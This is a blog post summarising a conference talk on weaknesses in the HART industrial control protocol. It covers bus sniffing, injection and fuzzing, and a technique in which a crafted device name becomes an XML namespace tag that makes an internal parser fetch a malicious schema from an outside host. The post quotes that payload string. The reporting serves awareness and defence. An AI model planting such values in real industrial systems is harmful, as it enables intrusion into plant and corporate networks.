At the S4x14 conference in Miami this past week, Alexander Bolshev of ERPScan gave an presentation on his work on the Highway Addressable Remote Transducer protocol (HART). HART is a commonly used industrial protocol for communication over legacy 4-20 ma signaling, what non-controls people call “copper wire”. It has TCP/IP extensions as well, and Alexander covers those in the presentation too, but the main focus is on the device level network using the 4-20ma signaling.
In order to test his theories, Alexander built a Arduino shield that interfaces to the HART bus and allows sniffing and communication over the bus. Pretty clever. His schematics and code are up at https://github.com/Darkkey, and slides are here.
The ICS community has known for a while that HART is an insecure by design protocol. It has always been assumed that if an attacker had access to the HART bus/network, they would be able to perform a lot of interesting attacks directly against HART devices, including jamming, data injection, and fuzzing of the master station. Alexander shows this, and then does one better by showing how the data path from the HART device up to the Manufacturing Execution System (MES) can be utilized to perform actions or compromise systems on the control system network, or even on the corporate network.
This data path involves a link between data provided by over the HART network and a common IT scheme, XML Namespaces. In his presentation, he discusses how HART long character names are translated into XML and eventually displayed in a specific HART engineering software or transferred to an enterprise process management system.
Most control system engineers have zero idea of what XML namespaces are, and even less about how they are used in systems they may interact with. I actually had to go to Matthew Strom, a web developer who works in my building, to get an explanation of XML tags and vulnerabilities.
Basically, Alexander puts a device with a specific name on the HART network. In his example case, the XML data being output to includes a “xmlns=”x-scheme:http://123q.ru”” tag. This instructs a standard XML parser to retrieve data on how to interpret it’s instructions from the “http://123q.ru” address. The XML parser dutifully goes to http://123q.ru to download the malicious schema, and takes action based on what it downloaded.
That’s right, using a HART based delivery mechanism, a malicious individual could instruct an internal system to go out to an external website, download code, and run it.
Even worse, Alexander notes that industrial systems may not have patches for components that are typically considered ‘internet’ related, and an exploit might be a simple as navigating to the website. In fact, in his slides, the agent-string used for the communication corresponds to an extremely old version of Internet Explorer, which has a bunch of vulnerabilities associated. It was likely included as an object in the MES application, and never got updated because they never considered it could be co-opted.
So, what’s the important takeaway? Control systems can use IT interfaces under the hood for important processing, and vulnerabilities in these under the hood components can be used in surprising and interesting ways to get malicious code in, or important data out.
Let’s see if we can get DNS tunneling working from the HART bus next.
image by Hryck.
title totally stolen from @ChrisSistrunk